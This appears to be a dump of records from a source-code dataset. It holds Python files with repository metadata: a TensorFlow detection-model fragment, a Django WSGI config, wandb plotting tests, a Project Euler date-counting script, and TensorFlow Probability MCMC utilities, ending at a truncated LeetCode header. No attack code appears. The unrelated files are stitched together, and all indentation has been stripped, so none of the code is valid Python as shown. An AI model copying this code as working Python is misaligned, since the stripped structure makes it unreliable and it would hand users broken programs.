fine_tune_checkpoint_type='detection',
load_all_detection_checkpoint_vars=False):
"""Returns a map of variables to load from a foreign checkpoint.
See parent class for details.
Args:
fine_tune_checkpoint_type: whether to restore from a full detection
checkpoint (with compatible variable names) or to restore from a
classification checkpoint for initialization prior to training.
Valid values: `detection`, `classification`. Default 'detection'.
load_all_detection_checkpoint_vars: whether to load all variables (when
`fine_tune_checkpoint_type` is `detection`). If False, only variables
within the feature extractor scopes are included. Default False.
Returns:
A dict mapping variable names (to load from a checkpoint) to variables in
the model graph.
Raises:
ValueError: if fine_tune_checkpoint_type is neither `classification`
nor `detection`.
"""
if fine_tune_checkpoint_type not in ['detection', 'classification']:
raise ValueError('Not supported fine_tune_checkpoint_type: {}'.format(
fine_tune_checkpoint_type))
if fine_tune_checkpoint_type == 'classification':
return self._feature_extractor.restore_from_classification_checkpoint_fn(
self.first_stage_feature_extractor_scope,
self.second_stage_feature_extractor_scope)
variables_to_restore = variables_helper.get_global_variables_safely()
variables_to_restore.append(slim.get_or_create_global_step())
# Only load feature extractor variables to be consistent with loading from
# a classification checkpoint.
include_patterns = None
if not load_all_detection_checkpoint_vars:
include_patterns = [
self.first_stage_feature_extractor_scope,
self.second_stage_feature_extractor_scope
]
feature_extractor_variables = contrib_framework.filter_variables(
variables_to_restore, include_patterns=include_patterns)
return {var.op.name: var for var in feature_extractor_variables}
def updates(self):
"""Returns a list of update operators for this model.
Returns a list of update operators for this model that must be executed at
each training step. The estimator's train op needs to have a control
dependency on these updates.
Returns:
A list of update operators.
"""
update_ops = []
slim_update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
# Copy the slim ops to avoid modifying the collection
if slim_update_ops:
update_ops.extend(slim_update_ops)
# Passing None to get_updates_for grabs updates that should always be
# executed and don't depend on any model inputs in the graph.
# (E.g. if there was some count that should be incremented every time a
# model is run).
#
# Passing inputs grabs updates that are transitively computed from the
# model inputs being passed in.
# (E.g. a batchnorm update depends on the observed inputs)
if self._feature_extractor_for_proposal_features:
if (self._feature_extractor_for_proposal_features !=
_UNINITIALIZED_FEATURE_EXTRACTOR):
update_ops.extend(
self._feature_extractor_for_proposal_features.get_updates_for(None))
update_ops.extend(
self._feature_extractor_for_proposal_features.get_updates_for(
self._feature_extractor_for_proposal_features.inputs))
if isinstance(self._first_stage_box_predictor_first_conv,
tf.keras.Model):
update_ops.extend(
self._first_stage_box_predictor_first_conv.get_updates_for(
None))
update_ops.extend(
self._first_stage_box_predictor_first_conv.get_updates_for(
self._first_stage_box_predictor_first_conv.inputs))
if self._first_stage_box_predictor.is_keras_model:
update_ops.extend(
self._first_stage_box_predictor.get_updates_for(None))
update_ops.extend(
self._first_stage_box_predictor.get_updates_for(
self._first_stage_box_predictor.inputs))
if self._feature_extractor_for_box_classifier_features:
if (self._feature_extractor_for_box_classifier_features !=
_UNINITIALIZED_FEATURE_EXTRACTOR):
update_ops.extend(
self._feature_extractor_for_box_classifier_features.get_updates_for(
None))
update_ops.extend(
self._feature_extractor_for_box_classifier_features.get_updates_for(
self._feature_extractor_for_box_classifier_features.inputs))
if self._mask_rcnn_box_predictor:
if self._mask_rcnn_box_predictor.is_keras_model:
update_ops.extend(
self._mask_rcnn_box_predictor.get_updates_for(None))
update_ops.extend(
self._mask_rcnn_box_predictor.get_updates_for(
self._mask_rcnn_box_predictor.inputs))
return update_ops
| 48.593387 | 80 | 0.710252 |
7df164673d3f1a0beb5c58712212dc28712f9f13 | 383 | py | Python | SMS/wsgi.py | judeakinwale/SMS-backup | 30636591b43bec94e7406f4c02fde402a5a2e38f | [
"MIT"
] | null | null | null | SMS/wsgi.py | judeakinwale/SMS-backup | 30636591b43bec94e7406f4c02fde402a5a2e38f | [
"MIT"
] | null | null | null | SMS/wsgi.py | judeakinwale/SMS-backup | 30636591b43bec94e7406f4c02fde402a5a2e38f | [
"MIT"
] | null | null | null | """
WSGI config for SMS project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'SMS.settings')
application = get_wsgi_application()
| 22.529412 | 78 | 0.780679 |
2696d82b55f444ee687c952a20b43ecb250e77b4 | 1,345 | py | Python | tests/test_plots.py | louiskirsch/wandb | 09ac34824180399a21e6d55ee18c80f5bdf93373 | [
"Apache-2.0"
] | 1 | 2020-08-20T14:02:47.000Z | 2020-08-20T14:02:47.000Z | tests/test_plots.py | louiskirsch/wandb | 09ac34824180399a21e6d55ee18c80f5bdf93373 | [
"Apache-2.0"
] | null | null | null | tests/test_plots.py | louiskirsch/wandb | 09ac34824180399a21e6d55ee18c80f5bdf93373 | [
"Apache-2.0"
] | null | null | null | import pytest
from sklearn.naive_bayes import MultinomialNB
import wandb
from wandb.plots.roc import roc
from wandb.sklearn import learning_curve
from wandb.plots.precision_recall import precision_recall
from wandb.plots.heatmap import heatmap
@pytest.fixture
def dummy_classifier(request):
nb = MultinomialNB()
x_train = [[1,2],[1,2],[1,2],[1,2],[2,3],[3,4],[3,4],[3,4],[3,4],[3,4],[3,4]]
y_train = [0,0,0,0,0,1,1,1,1,1,1]
nb.fit(x_train, y_train)
x_test = [[4,5], [5,6]]
y_test = [0,1]
y_probas = nb.predict_proba(x_test)
y_pred = nb.predict(x_test)
return (nb, x_train, y_train, x_test, y_test, y_pred, y_probas)
def test_roc(dummy_classifier):
(nb, x_train, y_train, x_test, y_test, y_pred, y_probas) = dummy_classifier
lc_table = learning_curve(nb, x_train, y_train)
r = roc(y_test, y_probas)
assert(r.value.data[0] == [0, 0.0, 0.0])
def test_precision_recall(dummy_classifier):
(nb, x_train, y_train, x_test, y_test, y_pred, y_probas) = dummy_classifier
pr = precision_recall(y_test, y_probas)
assert(pr.value.data[0]== [0, 1.0, 1.0])
def test_heatmap():
matrix_values = [[1,2],[3,4],[5,6],[7,8],[9,10]]
x_labels=['a', 'b']
y_labels=['A', 'B', 'C', 'D', 'E']
hm = heatmap(x_labels, y_labels, matrix_values)
assert(hm.value.data[4]== ['a', 'E', 9])
| 32.804878 | 81 | 0.657993 |
70d9440325d7daf95649e1d34464028467326c0e | 1,509 | py | Python | euler/0/19.py | PandaDrunkard/proex | c303f051721d9f271d8187957a4458dc5f4558b1 | [
"MIT"
] | null | null | null | euler/0/19.py | PandaDrunkard/proex | c303f051721d9f271d8187957a4458dc5f4558b1 | [
"MIT"
] | null | null | null | euler/0/19.py | PandaDrunkard/proex | c303f051721d9f271d8187957a4458dc5f4558b1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
days_of_month = {
1: 31,
2: 28,
3: 31,
4: 30,
5: 31,
6: 30,
7: 31,
8: 31,
9: 30,
10: 31,
11: 30,
12: 31,
}
def calculate():
c = 0
for d in iterate_days():
if d["year"] < 1901:
continue
if d["year"] > 2000:
break
if d["day"] == 1 and d["day_of_week"] == 0:
c += 1
return c
def iterate_days():
d = {"year":1900,"month":1,"day":1,"day_of_week":1}
while True:
if d["day"] == 1:
print(d)
yield d
d = get_next_day(d)
def get_next_day(c):
last_day = get_last_day(c["year"],c["month"])
if c["day"] < last_day:
# in mid of month
c["day"] += 1
else:
# in end of month
if c["month"] == 12:
# 12/31
c["year"] += 1
c["month"] = 1
c["day"] = 1
else:
c["month"] += 1
c["day"] = 1
c["day_of_week"] = get_next_day_of_week(c["day_of_week"])
return c
def get_last_day(year,month):
if month == 2:
# https://en.wikipedia.org/wiki/Leap_year
if year % 400 == 0:
return 29
if year % 100 == 0:
return 28
if year % 4 == 0:
return 29
return 28
else:
return days_of_month[month]
def get_next_day_of_week(c):
if c > 5:
return 0
else:
return c+1
print(calculate())
| 19.855263 | 61 | 0.444003 |
85c06b3e99b17d8e5deebf4663f207455364c1db | 28,215 | py | Python | tensorflow_probability/python/mcmc/internal/util.py | simeoncarstens/probability | 054a720ff9f221dd9660acd7ce7fb38a1dbb1290 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/python/mcmc/internal/util.py | simeoncarstens/probability | 054a720ff9f221dd9660acd7ce7fb38a1dbb1290 | [
"Apache-2.0"
] | 2 | 2021-08-25T16:14:51.000Z | 2022-02-10T04:47:11.000Z | tensorflow_probability/python/mcmc/internal/util.py | michalbrys/probability | 054a720ff9f221dd9660acd7ce7fb38a1dbb1290 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Internal utility functions for implementing TransitionKernels."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import warnings
# Dependency imports
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.internal import distribution_util as dist_util
from tensorflow_probability.python.internal import dtype_util
from tensorflow_probability.python.internal import prefer_static
from tensorflow_probability.python.internal import tensorshape_util
from tensorflow_probability.python.math.gradient import value_and_gradient as tfp_math_value_and_gradients
from tensorflow.python.ops import control_flow_util # pylint: disable=g-direct-tensorflow-import
from tensorflow.python.util import deprecation # pylint: disable=g-direct-tensorflow-import
__all__ = [
'choose',
'enable_store_parameters_in_results',
'left_justified_expand_dims_like',
'left_justified_expand_dims_to',
'left_justified_broadcast_like',
'left_justified_broadcast_to',
'index_remapping_gather',
'is_list_like',
'is_namedtuple_like',
'make_innermost_getter',
'make_innermost_setter',
'make_name',
'maybe_call_fn_and_grads',
'prepare_state_parts',
'PrettyNamedTupleMixin',
'safe_sum',
'SEED_CTOR_ARG_DEPRECATION_MSG',
'set_doc',
'smart_for_loop',
'strip_seeds',
'trace_scan',
'warn_if_parameters_are_not_simple_tensors',
]
SEED_CTOR_ARG_DEPRECATION_MSG = (
'Seeding `tfp.mcmc.TransitionKernel` instances by constructor argument is '
'deprecated. Use the `seed` argument to `tfp.mcmc.sample_chain` or '
'directly on `one_step`. The legacy behavior is still supported and should '
'be through 2020-09-20.')
class PrettyNamedTupleMixin(object):
"""Mixin adding a nicer `__repr__` for `namedtuple`s."""
__slots__ = ()
def __repr__(self):
return '{}(\n{}\n)'.format(
type(self).__name__,
',\n'.join(' {}={}'.format(k, repr(v).replace('\n', '\n '))
for (k, v) in self._asdict().items()))
def left_justified_expand_dims_like(x, reference, name=None):
"""Right pads `x` with `rank(reference) - rank(x)` ones."""
with tf.name_scope(name or 'left_justified_expand_dims_like'):
return left_justified_expand_dims_to(x, prefer_static.rank(reference))
def left_justified_expand_dims_to(x, rank, name=None):
"""Right pads `x` with `rank - rank(x)` ones."""
with tf.name_scope(name or 'left_justified_expand_dims_to'):
rank = tf.convert_to_tensor(rank, dtype=tf.int32)
expand_ndims = prefer_static.maximum(rank - prefer_static.rank(x), 0)
expand_shape = prefer_static.concat(
[prefer_static.shape(x),
prefer_static.ones(shape=[expand_ndims], dtype=tf.int32)],
axis=0)
return prefer_static.reshape(x, expand_shape)
def left_justified_broadcast_like(x, reference, name=None):
"""Broadcasts `x` to shape of reference, in a left-justified manner."""
with tf.name_scope(name or 'left_justified_broadcast_like'):
return left_justified_broadcast_to(x, prefer_static.shape(reference))
def left_justified_broadcast_to(x, shape, name=None):
"""Broadcasts `x` to shape, in a left-justified manner."""
with tf.name_scope(name or 'left_justified_broadcast_to'):
return tf.broadcast_to(
left_justified_expand_dims_to(x, prefer_static.size(shape)), shape)
def prepare_state_parts(state_or_state_part, dtype=None, name=None):
"""Calls c2t on each element or the entirety if not iterable; returns list."""
# Don't use tf.name_scope since this function has ct2-like semantics.
is_multipart = is_list_like(state_or_state_part)
state_parts = state_or_state_part if is_multipart else [state_or_state_part]
state_parts = [tf.convert_to_tensor(x, dtype=dtype, name=name)
for x in state_parts]
return state_parts, is_multipart
def is_list_like(x):
"""Helper which returns `True` if input is `list`-like."""
return isinstance(x, (tuple, list))
def is_namedtuple_like(x):
"""Helper which returns `True` if input is `collections.namedtuple`-like."""
try:
for fn in x._fields:
_ = getattr(x, fn)
return True
except AttributeError:
return False
def make_name(super_name, default_super_name, sub_name):
"""Helper which makes a `str` name; useful for tf.name_scope."""
name = super_name if super_name is not None else default_super_name
if sub_name is not None:
name += '_' + sub_name
return name
def _choose_base_case(is_accepted,
proposed,
current,
name=None):
"""Helper to `choose` which expand_dims `is_accepted` and applies tf.where."""
def _where(proposed, current):
"""Wraps `tf.where`."""
if proposed is current:
return proposed
# Preserve the name from `current` so names can propagate from
# `bootstrap_results`.
name = getattr(current, 'name', None)
if name is not None:
name = name.rpartition('/')[2].rsplit(':', 1)[0]
# Since this is an internal utility it is ok to assume
# tf.shape(proposed) == tf.shape(current).
return tf.where(left_justified_expand_dims_like(is_accepted, proposed),
proposed, current, name=name)
with tf.name_scope(name or 'choose'):
if not is_list_like(proposed):
return _where(proposed, current)
return [(choose(is_accepted, p, c, name=name) if is_namedtuple_like(p)
else _where(p, c))
for p, c in zip(proposed, current)]
def choose(is_accepted, proposed, current, name=None):
"""Helper which expand_dims `is_accepted` then applies tf.where."""
with tf.name_scope(name or 'choose'):
if not is_namedtuple_like(proposed):
return _choose_base_case(is_accepted, proposed, current, name=name)
if not isinstance(proposed, type(current)):
raise TypeError('Type of `proposed` ({}) must be identical to '
'type of `current` ({})'.format(
type(proposed).__name__,
type(current).__name__))
items = {}
for fn in proposed._fields:
items[fn] = choose(is_accepted,
getattr(proposed, fn),
getattr(current, fn),
name=name)
return type(proposed)(**items)
def strip_seeds(obj):
if not is_namedtuple_like(obj):
return obj
return type(obj)(**{fn: strip_seeds(fv) if fn != 'seed' else []
for fn, fv in obj._asdict().items()})
def safe_sum(x, alt_value=-np.inf, name=None):
"""Elementwise adds list members, replacing non-finite results with alt_value.
Typically the `alt_value` is chosen so the `MetropolisHastings`
`TransitionKernel` always rejects the proposal.
Args:
x: Python `list` of `Tensors` to elementwise add.
alt_value: Python scalar used to replace any elementwise sums which would
otherwise be non-finite.
name: Python `str` name prefixed to Ops created by this function.
Default value: `None` (i.e., "safe_sum").
Returns:
safe_sum: `Tensor` representing the elementwise sum of list of `Tensor`s
`x` or `alt_value` where sums are non-finite.
Raises:
TypeError: if `x` is not list-like.
ValueError: if `x` is empty.
"""
with tf.name_scope(name or 'safe_sum'):
if not is_list_like(x):
raise TypeError('Expected list input.')
if not x:
raise ValueError('Input should not be empty.')
in_shape = x[0].shape
x = tf.add_n(x)
x = tf.where(tf.math.is_finite(x), x, tf.constant(alt_value, dtype=x.dtype))
tensorshape_util.set_shape(x, in_shape)
return x
def set_doc(value):
"""Decorator to programmatically set a function docstring."""
def _doc(func):
func.__doc__ = value
return func
return _doc
def _value_and_gradients(fn, fn_arg_list, result=None, grads=None, name=None):
"""Helper to `maybe_call_fn_and_grads`."""
with tf.name_scope(name or 'value_and_gradients'):
def _convert_to_tensor(x, name):
ctt = lambda x_: None if x_ is None else tf.convert_to_tensor( # pylint: disable=g-long-lambda
x_, name=name)
return [ctt(x_) for x_ in x] if is_list_like(x) else ctt(x)
fn_arg_list = (list(fn_arg_list) if is_list_like(fn_arg_list)
else [fn_arg_list])
fn_arg_list = _convert_to_tensor(fn_arg_list, 'fn_arg')
if result is None:
result = fn(*fn_arg_list)
if grads is None and tf.executing_eagerly():
# Ensure we disable bijector cacheing in eager mode.
# TODO(b/72831017): Remove this once bijector cacheing is fixed for
# eager mode.
fn_arg_list = [0 + x for x in fn_arg_list]
result = _convert_to_tensor(result, 'fn_result')
if grads is not None:
grads = _convert_to_tensor(grads, 'fn_grad')
return result, grads
if is_list_like(result) and len(result) == len(fn_arg_list):
# Compute the block diagonal of Jacobian.
# TODO(b/79158574): Guard this calculation by an arg which explicitly
# requests block diagonal Jacobian calculation.
def fn_slice(i):
"""Needed to prevent `cell-var-from-loop` pylint warning."""
return lambda x: fn(*(fn_arg_list[:i] + [x] + fn_arg_list[i+1:]))
grads = [
tfp_math_value_and_gradients(fn_slice(i), fn_arg_list[i])[1]
for i in range(len(result))
]
else:
_, grads = tfp_math_value_and_gradients(fn, fn_arg_list)
return result, grads
def maybe_call_fn_and_grads(fn,
fn_arg_list,
result=None,
grads=None,
check_non_none_grads=True,
name=None):
"""Calls `fn` and computes the gradient of the result wrt `args_list`."""
with tf.name_scope(name or 'maybe_call_fn_and_grads'):
fn_arg_list = (list(fn_arg_list) if is_list_like(fn_arg_list)
else [fn_arg_list])
result, grads = _value_and_gradients(fn, fn_arg_list, result, grads)
if not all(dtype_util.is_floating(r.dtype)
for r in (result if is_list_like(result) else [result])): # pylint: disable=superfluous-parens
raise TypeError('Function result must be a `Tensor` with `float` '
'`dtype`.')
if len(fn_arg_list) != len(grads):
raise ValueError('Function args must be in one-to-one correspondence '
'with grads.')
if check_non_none_grads and any(g is None for g in grads):
raise ValueError('Encountered `None` gradient.\n'
' fn_arg_list: {}\n'
' grads: {}'.format(fn_arg_list, grads))
return result, grads
def smart_for_loop(loop_num_iter, body_fn, initial_loop_vars,
parallel_iterations=10, name=None):
"""Construct a for loop, preferring a python loop if `n` is statically known.
Given `loop_num_iter` and `body_fn`, return an op corresponding to executing
`body_fn` `loop_num_iter` times, feeding previous outputs of `body_fn` into
the next iteration.
If `loop_num_iter` is statically known, the op is constructed via python for
loop, and otherwise a `tf.while_loop` is used.
Args:
loop_num_iter: `Integer` `Tensor` representing the number of loop
iterations.
body_fn: Callable to be executed `loop_num_iter` times.
initial_loop_vars: Listlike object of `Tensors` to be passed in to
`body_fn`'s first execution.
parallel_iterations: The number of iterations allowed to run in parallel.
It must be a positive integer. See `tf.while_loop` for more details.
Default value: `10`.
name: Python `str` name prefixed to Ops created by this function.
Default value: `None` (i.e., "smart_for_loop").
Returns:
result: `Tensor` representing applying `body_fn` iteratively `n` times.
"""
with tf.name_scope(name or 'smart_for_loop'):
loop_num_iter_ = tf.get_static_value(loop_num_iter)
if (loop_num_iter_ is None or tf.executing_eagerly() or
control_flow_util.GraphOrParentsInXlaContext(
tf1.get_default_graph())):
# Cast to int32 to run the comparison against i in host memory,
# where while/LoopCond needs it.
loop_num_iter = tf.cast(loop_num_iter, dtype=tf.int32)
return tf.while_loop(
cond=lambda i, *args: i < loop_num_iter,
body=lambda i, *args: [i + 1] + list(body_fn(*args)),
loop_vars=[np.int32(0)] + initial_loop_vars,
parallel_iterations=parallel_iterations
)[1:]
result = initial_loop_vars
for _ in range(loop_num_iter_):
result = body_fn(*result)
return result
def trace_scan(loop_fn,
initial_state,
elems,
trace_fn,
trace_criterion_fn=None,
static_trace_allocation_size=None,
parallel_iterations=10,
name=None):
"""A simplified version of `tf.scan` that has configurable tracing.
This function repeatedly calls `loop_fn(state, elem)`, where `state` is the
`initial_state` during the first iteration, and the return value of `loop_fn`
for every iteration thereafter. `elem` is a slice of `elements` along the
first dimension, accessed in order. Additionally, it calls `trace_fn` on the
return value of `loop_fn`. The `Tensor`s in return values of `trace_fn` are
stacked and returned from this function, such that the first dimension of
those `Tensor`s matches the size of `elems`.
Args:
loop_fn: A callable that takes in a `Tensor` or a nested collection of
`Tensor`s with the same structure as `initial_state`, a slice of `elems`
and returns the same structure as `initial_state`.
initial_state: A `Tensor` or a nested collection of `Tensor`s passed to
`loop_fn` in the first iteration.
elems: A `Tensor` that is split along the first dimension and each element
of which is passed to `loop_fn`.
trace_fn: A callable that takes in the return value of `loop_fn` and returns
a `Tensor` or a nested collection of `Tensor`s.
trace_criterion_fn: Optional callable that takes in the return value of
`loop_fn` and returns a boolean `Tensor` indicating whether to trace it.
If `None`, all steps are traced.
Default value: `None`.
static_trace_allocation_size: Optional Python `int` size of trace to
allocate statically. This should be an upper bound on the number of steps
traced and is used only when the length cannot be
statically inferred (for example, if a `trace_criterion_fn` is specified).
It is primarily intended for contexts where static shapes are required,
such as in XLA-compiled code.
Default value: `None`.
parallel_iterations: Passed to the internal `tf.while_loop`.
name: Name scope used in this function. Default: 'trace_scan'.
Returns:
final_state: The final return value of `loop_fn`.
trace: The same structure as the return value of `trace_fn`, but with each
`Tensor` being a stack of the corresponding `Tensors` in the return value
of `trace_fn` for each slice of `elems`.
"""
with tf.name_scope(name or 'trace_scan'), tf1.variable_scope(
tf1.get_variable_scope()) as vs:
if vs.caching_device is None and not tf.executing_eagerly():
vs.set_caching_device(lambda op: op.device)
initial_state = tf.nest.map_structure(
lambda x: tf.convert_to_tensor(x, name='initial_state'),
initial_state)
elems = tf.convert_to_tensor(elems, name='elems')
length = prefer_static.size0(elems)
# This is an TensorArray in part because of XLA, which had trouble with
# non-statically known indices. I.e. elems[i] errored, but
# elems_array.read(i) worked.
elems_array = tf.TensorArray(
elems.dtype, size=length, element_shape=elems.shape[1:])
elems_array = elems_array.unstack(elems)
# Initialize trace arrays.
dynamic_size, initial_size = True, 0
if trace_criterion_fn is None:
dynamic_size, initial_size = tf.is_tensor(length), length
elif static_trace_allocation_size:
dynamic_size, initial_size = False, static_trace_allocation_size
trace_arrays = tf.nest.map_structure(
lambda x: tf.TensorArray(x.dtype, # pylint: disable=g-long-lambda
size=initial_size,
dynamic_size=dynamic_size,
element_shape=x.shape),
trace_fn(initial_state))
# Helper for writing a (structured) state to (structured) arrays.
def trace_one_step(num_steps_traced, trace_arrays, state):
return tf.nest.map_structure(
lambda ta, x: ta.write(num_steps_traced, x),
trace_arrays,
trace_fn(state))
def _body(i, state, num_steps_traced, trace_arrays):
elem = elems_array.read(i)
state = loop_fn(state, elem)
trace_arrays, num_steps_traced = prefer_static.cond(
trace_criterion_fn(state) if trace_criterion_fn else True,
lambda: (trace_one_step(num_steps_traced, trace_arrays, state), # pylint: disable=g-long-lambda
num_steps_traced + 1),
lambda: (trace_arrays, num_steps_traced))
return i + 1, state, num_steps_traced, trace_arrays
_, final_state, _, trace_arrays = tf.while_loop(
cond=lambda i, *_: i < length,
body=_body,
loop_vars=(0, initial_state, 0, trace_arrays),
parallel_iterations=parallel_iterations)
stacked_trace = tf.nest.map_structure(lambda x: x.stack(), trace_arrays)
# Restore the static length if we know it.
static_length = tf.TensorShape(None if dynamic_size else initial_size)
def _merge_static_length(x):
tensorshape_util.set_shape(x, static_length.concatenate(x.shape[1:]))
return x
stacked_trace = tf.nest.map_structure(_merge_static_length, stacked_trace)
return final_state, stacked_trace
def make_innermost_setter(setter):
"""Wraps a setter so it applies to the inner-most results in `kernel_results`.
The wrapped setter unwraps `kernel_results` and applies `setter` to the first
results without an `inner_results` attribute.
Args:
setter: A callable that takes the kernel results as well as some `*args` and
`**kwargs` and returns a modified copy of those kernel results.
Returns:
new_setter: A wrapped `setter`.
"""
@functools.wraps(setter)
def _new_setter(kernel_results, *args, **kwargs):
"""Wrapped setter."""
results_stack = []
while hasattr(kernel_results, 'inner_results'):
results_stack.append(kernel_results)
kernel_results = kernel_results.inner_results
new_kernel_results = setter(kernel_results, *args, **kwargs)
for outer_results in reversed(results_stack):
new_kernel_results = outer_results._replace(
inner_results=new_kernel_results)
return new_kernel_results
return _new_setter
def make_innermost_getter(getter):
"""Wraps a getter so it applies to the inner-most results in `kernel_results`.
The wrapped getter unwraps `kernel_results` and returns the return value of
`getter` called with the first results without an `inner_results` attribute.
Args:
getter: A callable that takes Kernel results and returns some value.
Returns:
new_getter: A wrapped `getter`.
"""
@functools.wraps(getter)
def _new_getter(kernel_results, *args, **kwargs):
"""Wrapped getter."""
results_stack = []
while hasattr(kernel_results, 'inner_results'):
results_stack.append(kernel_results)
kernel_results = kernel_results.inner_results
return getter(kernel_results, *args, **kwargs)
return _new_getter
def enable_store_parameters_in_results(kernel):
"""Enables the `store_parameters_in_results` parameter in a chain of kernels.
This is a temporary utility for use during the transition period of the
parameter storage methods.
Args:
kernel: A TransitionKernel.
Returns:
kernel: The same kernel, but recreated with `store_parameters_in_results`
recursively set to `True` in its parameters and its inner kernels (as
appropriate).
"""
kernel_stack = []
while hasattr(kernel, 'parameters') and 'inner_kernel' in kernel.parameters:
kernel_stack.append(kernel)
kernel = kernel.parameters['inner_kernel']
def _recreate_kernel(kernel, parameters):
new_parameters = kernel.parameters.copy()
new_parameters.update(parameters)
if 'store_parameters_in_results' in new_parameters:
new_parameters['store_parameters_in_results'] = True
with deprecation.silence():
return type(kernel)(**new_parameters)
if hasattr(kernel, 'parameters'):
kernel = _recreate_kernel(kernel, {})
for outer_kernel in reversed(kernel_stack):
outer_kernel = _recreate_kernel(outer_kernel, {'inner_kernel': kernel})
kernel = outer_kernel
return kernel
def _is_tensor_like(param):
if is_list_like(param):
return all([_is_tensor_like(p) for p in param])
if isinstance(param, tf.Tensor):
return True
elif isinstance(param, tf.Variable):
return False
else:
return np.array(param).dtype != np.object
def warn_if_parameters_are_not_simple_tensors(params_dict):
for param_name, param in params_dict.items():
if not _is_tensor_like(param):
warnings.warn(
'`{}` is not a `tf.Tensor`, Python number, or Numpy array. If this '
'parameter is mutable (e.g., a `tf.Variable`), then the '
'behavior implied by `store_parameters_in_results` will silently '
'change on 2019-08-01. Please consult the docstring for '
'`store_parameters_in_results` details and use '
'`store_parameters_in_results=True` to silence this warning.'.format(
param_name))
def index_remapping_gather(params,
indices,
axis=0,
indices_axis=0,
name='index_remapping_gather'):
"""Gather values from `axis` of `params` using `indices_axis` of `indices`.
The shape of `indices` must broadcast to that of `params` when
their `indices_axis` and `axis` (respectively) are aligned:
```python
# params.shape:
[p[0], ..., ..., p[axis], ..., ..., p[rank(params)] - 1])
# indices.shape:
[i[0], ..., i[indices_axis], ..., i[rank(indices)] - 1])
```
In particular, `params` must have at least as many
leading dimensions as `indices` (`axis >= indices_axis`), and at least as many
trailing dimensions (`rank(params) - axis >= rank(indices) - indices_axis`).
The `result` has the same shape as `params`, except that the dimension
of size `p[axis]` is replaced by one of size `i[indices_axis]`:
```python
# result.shape:
[p[0], ..., ..., i[indices_axis], ..., ..., p[rank(params) - 1]]
```
In the case where `rank(params) == 5`, `rank(indices) == 3`, `axis = 2`, and
`indices_axis = 1`, the result is given by
```python
# alignment is: v axis
# params.shape == [p[0], p[1], p[2], p[3], p[4]]
# indices.shape == [i[0], i[1], i[2]]
# ^ indices_axis
result[i, j, k, l, m] = params[i, j, indices[j, k, l], l, m]
```
Args:
params: `N-D` `Tensor` (`N > 0`) from which to gather values.
Number of dimensions must be known statically.
indices: `Tensor` with values in `{0, ..., params.shape[axis] - 1}`, whose
shape broadcasts to that of `params` as described above.
axis: Python `int` axis of `params` from which to gather.
indices_axis: Python `int` axis of `indices` to align with the `axis`
over which `params` is gathered.
name: String name for scoping created ops.
Returns:
`Tensor` composed of elements of `params`.
Raises:
ValueError: If shape/rank requirements are not met.
"""
with tf.name_scope(name):
params = tf.convert_to_tensor(params, name='params')
indices = tf.convert_to_tensor(indices, name='indices')
params_ndims = tensorshape_util.rank(params.shape)
indices_ndims = tensorshape_util.rank(indices.shape)
# `axis` dtype must match ndims, which are 64-bit Python ints.
axis = tf.get_static_value(tf.convert_to_tensor(axis, dtype=tf.int64))
indices_axis = tf.get_static_value(
tf.convert_to_tensor(indices_axis, dtype=tf.int64))
if params_ndims is None:
raise ValueError(
'Rank of `params`, must be known statically. This is due to '
'tf.gather not accepting a `Tensor` for `batch_dims`.')
if axis is None:
raise ValueError(
'`axis` must be known statically. This is due to '
'tf.gather not accepting a `Tensor` for `batch_dims`.')
if indices_axis is None:
raise ValueError(
'`indices_axis` must be known statically. This is due to '
'tf.gather not accepting a `Tensor` for `batch_dims`.')
if indices_axis > axis:
raise ValueError(
'`indices_axis` should be <= `axis`, but was {} > {}'.format(
indices_axis, axis))
if params_ndims < 1:
raise ValueError(
'Rank of params should be `> 0`, but was {}'.format(params_ndims))
if indices_ndims is not None and indices_ndims < 1:
raise ValueError(
'Rank of indices should be `> 0`, but was {}'.format(indices_ndims))
if (indices_ndims is not None and
(indices_ndims - indices_axis > params_ndims - axis)):
raise ValueError(
'`rank(params) - axis` ({} - {}) must be >= `rank(indices) - '
'indices_axis` ({} - {}), but was not.'.format(
params_ndims, axis, indices_ndims, indices_axis))
# `tf.gather` requires the axis to be the rightmost batch ndim. So, we
# transpose `indices_axis` to be the rightmost dimension of `indices`...
transposed_indices = dist_util.move_dimension(indices,
source_idx=indices_axis,
dest_idx=-1)
# ... and `axis` to be the corresponding (aligned as in the docstring)
# dimension of `params`.
broadcast_indices_ndims = indices_ndims + (axis - indices_axis)
transposed_params = dist_util.move_dimension(
params,
source_idx=axis,
dest_idx=broadcast_indices_ndims - 1)
# Next we broadcast `indices` so that its shape has the same prefix as
# `params.shape`.
transposed_params_shape = prefer_static.shape(transposed_params)
result_shape = prefer_static.concat([
transposed_params_shape[:broadcast_indices_ndims - 1],
prefer_static.shape(indices)[indices_axis:indices_axis + 1],
transposed_params_shape[broadcast_indices_ndims:]], axis=0)
broadcast_indices = prefer_static.broadcast_to(
transposed_indices,
result_shape[:broadcast_indices_ndims])
result_t = tf.gather(transposed_params,
broadcast_indices,
batch_dims=broadcast_indices_ndims - 1,
axis=broadcast_indices_ndims - 1)
return dist_util.move_dimension(result_t,
source_idx=broadcast_indices_ndims - 1,
dest_idx=axis)
| 39.024896 | 110 | 0.671948 |
a932f0f76898ac06c45eb4c125cb8bb2c8ab054f | 1,063 | py | Python | Leetcode/0417. Pacific Atlantic Water Flow/0417.py | Next-Gen-UI/Code-Dynamics | a9b9d5e3f27e870b3e030c75a1060d88292de01c | [
"MIT"
